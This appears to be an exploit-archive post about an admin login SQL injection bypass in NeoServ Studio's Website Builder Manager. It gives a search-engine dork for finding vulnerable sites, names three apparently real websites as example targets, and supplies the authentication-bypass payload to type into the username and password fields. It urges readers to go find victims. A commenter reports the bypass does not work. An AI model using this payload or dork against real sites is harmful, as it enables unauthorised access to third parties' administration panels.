NeoServ Studio - Website Builder Manager Admin SQLi Bypass

2025.01.21

BQX (TR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:index.php?open=login intext:"Website Builder Manager"

#Exploit Title: NeoServ Studio - Website Builder Manager Admin SQLi Bypass
#Date: 20-01-2023
#Exploit Author: BQX ( ./Bertw_QX / ExtacyGod )
#Vendor Homepage: https://www.neoserv.si/
#Category: SQLi Bypass
#Tested On: Windows 11 - Google Chrome

Search this dork on google and use your brain.

Example websites:
https://www.dmcsee.org/index.php?open=login
http://www.glorydecor.com/index.php?open=login
https://www.cabinetbedap.org/index.php?open=login

Exploit user-pass:
'or '='

*********************************************************
#Telegram: @norketamin
#Instagram: @bqxsec
#Mail: extacygodz@gmail.com
*********************************************************

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

exhakter

| Date: 2025-01-24 09:14 CET+1

Doesnt work....

NeoServ Studio - Website Builder Manager Admin SQLi Bypass

Dork: inurl:index.php?open=login intext:"Website Builder Manager"

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

NeoServ Studio - Website Builder Manager Admin SQLi Bypass

Dork: inurl:index.php?open=login intext:"Website Builder Manager"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.